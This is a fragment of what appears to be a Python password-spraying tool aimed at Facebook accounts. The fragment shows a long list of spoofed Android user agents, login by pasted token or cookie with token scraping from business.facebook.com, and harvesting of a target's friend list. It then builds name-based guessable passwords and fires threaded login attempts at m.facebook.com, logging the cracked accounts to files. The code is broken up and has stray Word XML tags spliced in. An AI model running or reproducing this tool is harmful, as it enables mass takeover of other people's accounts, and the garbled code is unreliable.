SAMSUNG SM-M205F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-J600GT) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-G398FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A600G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A505FN/A505FNXXS5BTI9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A205FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A202F/A202FXXU3BTK2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A105FN/A105FNXXU4BTI2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A105F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-G955F/G955FXXU9DTF1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-A705FN/A705FNXXU3ASG6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-A705FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.1.0; en-au; SAMSUNG SM-J530F/J530FXXS5BSE3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-G935T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 7.1.1; en-au; SAMSUNG SM-J250F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4252.0 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 6.0.1; en-au; SAMSUNG SM-A8000) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 5.1.1; en-au; SAMSUNG SM-A51) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-P610) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-M315F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-M307F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-S215DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-P205) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-M115F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-M015G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-J600FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-G988B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A750F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A600A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A515U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A415F/A415FXXU1ATE1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A315F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A307FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A217M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A215U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A205W) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A125F/A125FXXU1ATL4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A115AZ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A107M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A025G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A015T1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-T865) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-T595) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-T510) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-M305M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-G970F/G970FXXU8DTH7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A3050) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A605K/KKU3CTF2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A505GN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-G955F/G955FXXSBDTJ1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.1.0; en-au; SAMSUNG SM-T385) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-G970U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-A520F/A520FXXSFCTG8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 7.0; en-au; SAMSUNG SM-A510F/A510FXXU7CRL2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 6.0.1; en-au; SAMSUNG SM-G906K/KTU1CPL1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 6.0.1; en-au; SAMSUNG SM-A700FD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.93 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 5.1.1; en-au; SAMSUNG SM-T287) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-G955U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-G955U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-N9750) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-M105F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-J810M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-J810F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-J610FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A707F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A705FN/A705FNXXU5BTJ4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A305GN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-G970F/G970FXXU3ASJD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; Redmi 7A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-J600GT Build/QP1A.190711.020) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A750GN Build/QP1A.190711.020) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-N950N Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-J415FN/J415FNXXU2BSDL Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.1.0; en-au; SAMSUNG SM-J730GM Build/M1AJQ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-N950N/KSU4CRJ2 Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-J720M Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-G930VL Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-G930R6 Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-A520S Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-A320Y Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 7.0; en-au; SAMSUNG SM-T825 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Safari/537.36', 'Mozilla/5.0 (Linux; Android 7.0; en-au; SAMSUNG SM-J727R4 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 7.0; en-au; SAMSUNG SM-G928T Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 6.0.1; en-au; SAMSUNG SM-N915S Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 5.1.1; en-au; SAMSUNG SM-G900T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 5.0.1; en-au; SAMSUNG SGH-M919V Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 6.0.1; en-au; SAMSUNG SM-J500M Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux;Android 7.0; en-au; SAMSUNG SM-T830 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Mobile Safari/537.36', 'Mozilla/5.0 (Linux;Android 7.0; en-au; SAMSUNG SM-T830 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-J720F Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safa', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-G960F/G960FXXU7CSJ1 Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-G960F/G960FXXU7CSJ1 Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-A605FN Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-A600FN/A600FNXXU3BSD2 Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.1.0; en-au; SAMSUNG SM-T587 Build/M1AJQ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.1.0; en-au; SAMSUNG SM-P580 Build/M1AJQ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.1.0; en-au; SAMSUNG SM-G615FU Build/M1AJQ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.1.0; en-au; SAMSUNG SM-G610M Build/M1AJQ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.1.0; en-au; SAMSUNG SM-G390F Build/M1AJQ) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/7.2 Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-J600FN/J600FNXXU3ASC1 Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-G950F/G950FXXS4CRLC Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-G891A Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-G570M Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-C5000 Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-A910F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 7.1.1; en-au; SAMSUNG SM-T385 Build/NMF26X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Safari/537.36', 'Mozilla/5.0 (Linux; Android 7.1.1; en-au; SAMSUNG SM-T355 Build/NMF26X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-J400F Build/QP1A.190711.020) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-G965F Build/QP1A.190711.020) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-G960F Build/QP1A.190711.020) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-J810Y Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-J810F Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-J600FN Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9.0.0; en-au; SAMSUNG SM-GT9001 Build/R18NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36']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INDICATION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id,id2,loop,akun,oprek,method,lisensiku,taplikasi,tokenku,uid,lisensikuni= [],[],0,[],[],[],[],[],[],[],[]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os.mkdir('/sdcard/')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except:pass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COLORS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'\33[m'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= '\033[93m'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= '\x1b[1;92m'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hh = '\033[32m'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= '\033[95m'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= '\033[95m'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kk = '\033[33m'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'\33[1;96m'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= '\x1b[0;34m'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Converter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 = {'1':'January','2':'February','3':'March','4':'April','5':'May','6':'June','7':'July','8':'Agustus','9':'September','10':'October','11':'November','12':'December'}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dic2 = {'01':'January','02':'February','03':'March','04':'April','05':'May','06':'June','07':'July','08':'Agustus','09':'September','10':'October','11':'November','12':'December'}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tgl = datetime.datetime.now().day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bln = dic[(str(datetime.datetime.now().month))]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thn = datetime.datetime.now().year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okc = 'OK-'+str(tgl)+'-'+str(bln)+'-'+str(thn)+'.txt'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cpc = 'CP-'+str(tgl)+'-'+str(bln)+'-'+str(thn)+'.txt'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CLEAR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clear():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os.system('clear')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back():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login()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alamgir="PRIYA-"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imt="-M4786=="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priya="ALAMGIR-"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myid=uuid.uuid4().hex[:10].upper()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key1 = open('/data/data/com.termux/files/usr/bin/.mrahsan-cov', 'r').read()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kok=open('/data/data/com.termux/files/usr/bin/.mrahsan-cov', 'w')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kok.write(myid+imt)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kok.close()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login():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token = open('.token.txt','r').read()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tokenku.append(token)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 = requests.get('https://graph.facebook.com/me?access_token='+tokenku[0])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public_menu()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except KeyError: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Public()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except requests.exceptions.ConnectionError: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clear()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print(logo)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( ' [×] Connection Timeout')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except IOError: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Public()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jalan(z):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e in z + '\n':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sys.stdout.write(e);sys.stdout.flush();time.sleep(0.01)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 #LOGO############## ##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Public():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clear()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print(logo)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 (' [01] Login With Token\n [02] Login With Cookie')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pil=input('\n [#] Select One : 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pil in ['1','01']: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panda = input(' [+] Token : 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akun=open('.token.txt','w').write(panda)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tes = requests.get('https://graph.facebook.com/me?access_token='+panda)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tes3 = json.loads(tes.text)['id']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(" [</w:t>
        <w:t xml:space="preserve"> ] Login Successful")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login()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except KeyError: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print( ' [×] Login Failed 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time.sleep(2.5)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Public()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except requests.exceptions.ConnectionError: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( ' [×] Connection Timeout')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elif pil in ['2','02']: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cookie=input(" [+] Cookie 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data = requests.get("https://business.facebook.com/business_locations", headers = {"user-agent": "Mozilla/5.0 (Linux; Android 12.1.0; MI 8 Build/OPM1.171019.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.86 Mobile Safari/537.36","referer":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https://www.facebook.com/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","host": "business.facebook.com","origin": "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https://business.facebook.com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","upgrade-insecure-requests" : "1","accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7","cache-control": "max-age=0","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8","content-type":"text/html; charset=utf-8"}, cookies = {"cookie":cookie})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find_token = re.search("(EAAG\w+)", data.text)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ken=open(".token.txt", "w").write(find_token.group(1))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(" [</w:t>
        <w:t xml:space="preserve"> ] Login Successful")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login()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except Exception as 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os.system("rm -f .token.txt")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print( ' [×] Login Failed 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time.sleep(2.5)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login()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public_menu():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token = open('.token.txt','r').read()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except IOError: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clear()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print(logo)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pil = input('\n [+] Enter ID Target : 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koh2 = requests.get('https://graph.facebook.com/v2.0/'+pil+'?fields=friends.limit(5000)&amp;access_token='+tokenku[0]).json()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pi in koh2['friends']['data']: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id.append(pi['id']+'|'+pi['name'])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print(' [</w:t>
        <w:t xml:space="preserve"> ] Total : '+str(len(id)))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setting()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except requests.exceptions.ConnectionError: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(' [#] Connection Time Out')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except (KeyError,IOError):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print(' [!] Not public Or Token Expire')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File():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clear()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print(logo)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fileX = input ('\n [+] Enter file path : ')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for line in open(fileX, 'r').readlines():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id.append(line.strip())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setting()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except IOError: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exit("\n [!] file %s not found"%(fileX))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setting():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hu = ("2")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hu in ['1','01']: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tua in sorted(id):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id2.append(tua)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elif hu in ['2','02']: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muda=[]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bacot in sorted(id):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muda.append(bacot)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bcm=len(muda)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bcmi=(bcm-1)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xmud in range(bcm):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id2.append(muda[bcmi])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bcmi -=1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elif hu in ['3','03']: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bacot in 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xx = random.randint(0,len(id2))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id2.insert(xx,bacot)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(' [!] Choose Correct Option')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clear()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print(logo);print ('\n [01] Method 1 ');print (' [02] Method 2 \033[1;97m')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hc = input ("\n [#] method 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hc in ['1','01']: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method.append('mobile')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elif hc in ['2','02']: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method.append('free')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method.append('mobile')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passmenu()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passmenu():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clear()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print(logo);print  ('\n [01] First name digit pass \n [02] All Name Password \n [03] All Name+ password')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passmen=input('\n [#] Select Pass : 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passmen in ['1','01']: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first()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elif passmen in ['2','02']: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name()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elif passmen in ['3','03']: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name2()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passmenu()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first():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clear()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print(logo);print( ' [!] \033[1;96mTurn Airplane Mode On/Off Every 5 Minutes\033[1;0m\n')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with tred(max_workers=30) as pool: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yuzong in id2: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idf,nmf = yuzong.split('|')[0],yuzong.split('|')[1].lower()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frs = nmf.split(' ')[0]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pwv = ['445566']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len(nmf)&lt;6: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len(frs)&lt;3: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pwv.append(frs+'123')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pwv.append(frs+'12345')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len(frs)&lt;3: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pwv.append(nmf)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pwv.append(nmf)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pwv.append(frs+'123')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pwv.append(frs+'12345')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'mobile' in method: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pool.submit(crack,idf,pwv)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elif 'free' in method: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pool.submit(free,idf,pwv)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pool.submit(crack,idf,pwv)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name():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clear()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print(logo);print( '\n [</w:t>
        <w:t xml:space="preserve"> ] OK Result Saved To : \033[1;92mOK/%s\033[1;97m\n [</w:t>
        <w:t xml:space="preserve"> ] CP Result Saved To : \033[1;91mCP/%s\033[1;97m\n [!] \033[1;96mTurn Airplane Mode On/Off Every 5 Minutes\033[1;0m\n'%(okc,cpc))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with tred(max_workers=30) as pool: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yuzong in id2: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idf,nmf = yuzong.split('|')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xz = nmf.split(' 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len(xz) == 3 or len(xz) == 4 or len(xz) == 5 or len(xz) == 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pwv = [name, xz[0]+xz[0],xz[0]+xz[1]+"12345", xz[0]+xz[1]+"786",xz[0]+xz[1]+"123",xz[0]+xz[1]+"1234"]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pwv = [name, xz[0]+xz[0],xz[0]+xz[1]+"12345", xz[0]+xz[1]+"786",xz[0]+xz[1]+"123",xz[0]+xz[1]+"1234"]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'mobile' in method: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pool.submit(crack,idf,pwv)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elif 'free' in method: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pool.submit(free,idf,pwv)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pool.submit(crack,idf,pwv)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except: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name2():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clear()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print(logo);print( '\n [</w:t>
        <w:t xml:space="preserve"> ] OK Result Saved To : \033[1;92mOK/%s\033[1;97m\n [</w:t>
        <w:t xml:space="preserve"> ] CP Result Saved To : \033[1;91mCP/%s\033[1;97m\n [!] \033[1;96mTurn Airplane Mode On/Off Every 5 Minutes\033[1;0m\n'%(okc,cpc))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with tred(max_workers=30) as pool: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yuzong in id2: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idf,nmf = yuzong.split('|')[0],yuzong.split('|')[1].lower()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frs = nmf.split(' ')[0]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pwv = ['445566']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len(nmf)&lt;6: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len(frs)&lt;3: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pwv.append(frs+'123')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pwv.append(frs+'12345')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len(frs)&lt;3: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pwv.append(nmf)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pwv.append(nmf)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pwv.append(frs+'123')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pwv.append(frs+'12345')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pwv.append(frs+'1234')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pwv.append(frs+'786')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'mobile' in method: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pool.submit(crack,idf,pwv)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elif 'free' in method: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pool.submit(free,idf,pwv)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pool.submit(crack,idf,pwv)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CRACKER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crack(idf,pwv):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global loop,ok,cp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bi = random.choice([u,k,kk,b,h,hh])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pers = loop*100/len(id2)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fff = '%'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sys.stdout.write('\r %s[ ALAMGIR ] %s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•%s • OK:%s • CP:%s  '%(bi,loop,len(id2),len(ok),cp)),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sys.stdout.flush()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ua = random.choice(ugen)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ua2 = random.choice(ugen2)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ses = requests.Session()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pw in pwv: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pw = pw.lower()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ses.headers.update({"Host":'m.facebook.com',"upgrade-insecure-requests":"1","user-agent":ua2,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by 